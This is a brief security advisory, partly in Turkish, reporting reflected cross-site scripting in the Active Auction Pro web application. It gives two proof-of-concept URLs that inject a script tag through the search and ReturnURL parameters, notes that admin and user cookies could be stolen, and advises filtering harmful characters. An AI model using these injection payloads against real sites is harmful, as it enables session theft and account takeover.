< ------------------- header data start ------------------- >

#############################################################

# Application Name : Active Auction Pro

# Vulnerable Type : Cross Site Scripting

# Infection : Yönetici ve user cookie’leri çalinabilir.

# Bug Fix Advice : Zararli karakterler filtrelenmelidir.

# author : Bug Researchers

#############################################################

< ------------------- header data end of ------------------- >



< -- bug code start -- >

/search.asp?search=><script>alert(x)</script>

/account.asp?ReturnURL=><script>alert(x)</script>


< -- bug code end of -- >